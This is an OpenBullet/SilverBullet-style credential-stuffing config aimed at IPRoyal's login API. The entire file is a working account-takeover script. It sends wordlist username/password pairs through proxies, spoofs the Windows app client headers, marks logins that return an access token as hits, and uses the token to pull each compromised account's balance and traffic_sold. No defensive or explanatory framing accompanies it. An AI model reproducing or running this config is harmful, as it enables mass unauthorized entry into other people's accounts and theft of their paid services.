[SETTINGS]
{
  "Name": "Iproyal-winApi-Hagasoo",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2022-01-29T22:09:23.2808513+03:30",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "Iproyal-winApi-Hagasoo",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
FUNCTION Length "{\"username\":\"<USER>\",\"password\":\"<PASS>\"}" -> VAR "LEN" 

#Post_Data REQUEST POST "https://api.iproyal.com/v1/users/login" 
  CONTENT "{\"username\":\"<USER>\",\"password\":\"<PASS>\"}" 
  CONTENTTYPE "application/json" 
  HEADER "Host: api.iproyal.com" 
  HEADER "User-Agent: Go-http-client/1.1" 
  HEADER "Accept: application/json" 
  HEADER "Content-Type: application/json" 
  HEADER "X-App-Arch: amd64" 
  HEADER "X-App-Os: windows" 
  HEADER "X-App-Version: 0.41.8" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "Content-Length: <LEN>" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "authenticate user failed:" 
    KEY "wrong_username_password" 
  KEYCHAIN Success OR 
    KEY "access_token" 

PARSE "<SOURCE>" JSON "access_token" -> VAR "TK" 

#Get_Cap REQUEST GET "https://api.iproyal.com/v1/users/me" 
  
  HEADER "Host: api.iproyal.com" 
  HEADER "User-Agent: Go-http-client/1.1" 
  HEADER "Accept: application/json" 
  HEADER "Access-Token: <TK>" 
  HEADER "Content-Type: application/json" 
  HEADER "X-App-Arch: amd64" 
  HEADER "X-App-Os: windows" 
  HEADER "X-App-Version: 0.41.8" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "Content-Length: 3" 

#Balance PARSE "<SOURCE>" JSON "balance" CreateEmpty=FALSE -> CAP "Balance" 

#Traffic_sold PARSE "<SOURCE>" JSON "traffic_sold" CreateEmpty=FALSE -> CAP "Traffic_sold" 

FUNCTION Constant "@Hagaso_o" -> CAP "ConfigBy" 

